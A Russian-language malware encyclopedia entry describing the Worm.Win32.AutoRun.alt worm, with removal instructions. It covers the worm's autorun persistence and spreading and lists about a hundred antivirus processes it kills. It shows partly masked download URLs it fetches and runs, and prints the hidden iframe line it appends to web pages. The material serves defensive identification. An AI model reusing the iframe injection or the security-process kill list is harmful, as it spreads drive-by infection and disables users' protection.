Worm.Win32.AutoRun.alt

Материал из Total Malware Info

Worm.Win32.AutoRun.alt Червь, создающий свои копии на локальных дисках и доступных для записи сетевых ресурсах. Является приложением Windows (PE-EXE файл). Имеет размер 31801 байт. Упакован при помощи FSG, распакованный размер 121 к.б.

Содержание 1 Инсталляция 2 Распространение 3 Деструктивная активность 4 Рекомендации по удалению

Инсталляция

Копирует свой исполняемый файл как:

%System%\crsss.exe

Для автоматического запуска при следующем старте системы вирус добавляет ссылку на свой исполняемый файл в ключи автозапуска системного реестра:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
crsss=%System%\crsss.exe

Распространение

Копирует свой исполняемый файл в корень каждого раздела жесткого диска с именем:

<X>:\niu.exe, где X – буква раздела

Так же вместе со своим исполняемым файлом червь помещает в корень раздела сопровождающий файл:

<X>:\autorun.inf

который запускает исполняемый файл червя, каждый раз, когда пользователь открывает зараженный раздел при помощи программы ”Проводник”.

Деструктивная активность

Завершает следующие процессы:

360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
AST.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
HijackThis.exe
FTCleanerShell.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
krepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
 KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
SysSafe.exe
TrojanDetector.exe
symlcsvc.exe
SREng.exe
SmartUp.exe
shcfg32.exe
scan32.exe
safelive.exe
runiep.exe
Rsaupd.exe
RsAgent.exe
rfwsrv.exe
RfwMain.exe
rfwcfg.exe
RegClean.exe
rfwProxy.exe
RavTask.exe
RavStub.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe
regedit.exe
msconfig.exe
mmc.exe
taskmgr.exe

Скачивает файлы по следующим ссылкам:

http://xx.5*****e.cn/tool/down1.txt
http://xx.5*****e.cn/tool/down3.txt
http://xx.5*****e.cn/tool/down2.txt
http://xx.5*****e.cn/tool/tj.asp

на момент создания описания ссылки не работали, файлы сохраняются под следующими именами:

%System%\down1.txt
%System%\down2.txt
%System%\down3.txt
%System%\tj.asp

и запускаются на выполнение. Так же червь ищет на жестком диске файлы, содержащие в имени следующие строки:

INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP

и добавляет в их конец строку:

<IfrAmE src=http://xx.5*****e.cn/html/noani.htm width=100 height=0></IfrAmE>

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. При помощи <Диспетчера задач> завершить вредоносный процесс.
2. Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить параметр в ключе системного реестра:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
crsss=%System%\crsss.exe

4. Удалить файлы:

%System%\crsss.exe
<X>:\niu.exe, где X – буква раздела
<X>:\autorun.inf
%System%\down1.txt
%System%\down2.txt
%System%\down3.txt
%System%\tj.asp